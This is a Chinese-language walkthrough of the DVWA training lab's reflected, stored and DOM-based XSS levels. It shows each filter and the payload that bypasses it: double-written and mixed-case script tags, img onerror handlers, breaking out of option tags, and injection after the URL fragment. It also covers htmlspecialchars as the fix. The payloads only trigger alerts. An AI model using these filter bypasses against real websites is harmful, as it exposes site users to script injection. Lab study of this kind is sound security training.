反射型
Low
直接输入<script>alert(/xss/)</script>
就可以发现弹窗
Medium
检查源码 可以看到网站对输入字符进行了过滤,尝试双写绕过,构造
<scr<script>ipt>alert(/xss/)</script> 输入进行尝试,弹窗xss说明ok!另一种方法就是大小写混写 构造一个 <Script>alert(/xss/)</Script>,成功,说明攻击成功!
High
先输入<Script>alert(/xss/)</Script>发现不管用了,然后打开源码,发现网站利用函数
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
过滤了字符,使得上面两种方法失效了。虽然无法使用标签注入XSS代码,但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。下面构造语句
<img src="" onerror="alert('XSS')"> 成功。
Impossible
核心代码: $name = htmlspecialchars( $_GET[ 'name' ] );
总结: htmlspecialchars 函数可以有效防止反射性xss
存储型
Low
查看源码,可以看出并没有防范xss的措施,直接在message框里面写入<script>alert(/xss/)</script>,成功执行。
Medium
strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签,但允许使用标签。
addslashes() 函数返回在预定义字符(单引号、双引号、反斜杠、NULL)之前添加反斜杠的字符串。
可以看到,由于对message参数使用了htmlspecialchars函数进行编码,因此无法再通过message参数注入XSS代码,但是对于name参数,只是简单过滤了字符串,仍然存在存储型的XSS。打开burp抓包,1.把name改成<sc<script>ript>alert(/xss/)</script>。Go 成功!2.大小写混淆绕过,改成<Script>alert(/xss/)</script>
High
打开源码可以看到,这里使用正则表达式过滤了标签,但是却忽略了img、iframe等其它危险的标签,因此name参数依旧存在存储型XSS。老办法,抓包改name参数为
<img src=1 onerror=alert(1)> 或者<img src="" onerror="alert('XSS')"> 成功弹窗
Impossible
打开源码,可以看到,通过使用htmlspecialchars函数,解决了XSS,但是要注意的是,如果htmlspecialchars函数使用不当,攻击者就可以通过编码的方式绕过函数进行XSS注入,尤其是DOM型的XSS。
想法:
htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。
预定义的字符是:
• & (和号)成为 &
• " (双引号)成为 "
• ' (单引号)成为 '
• < (小于)成为 <
• > (大于)成为 >
提示:如需把特殊的 HTML 实体转换回字符,请使用 htmlspecialchars_decode() 函数。
那么如果在有转义的地方,可不可以用decode这个函数转回字符,可以继续攻击呢?欢迎交流!
DOM型xss
low
default=<script>alert('xss')</script>弹窗
Medium
></option></select><img src=1 onerror=alert('hack')>
High
URL中#号之后的内容,不会被提交到服务器,可以直接与浏览器进行交互
default=English#<script>alert(1)</script>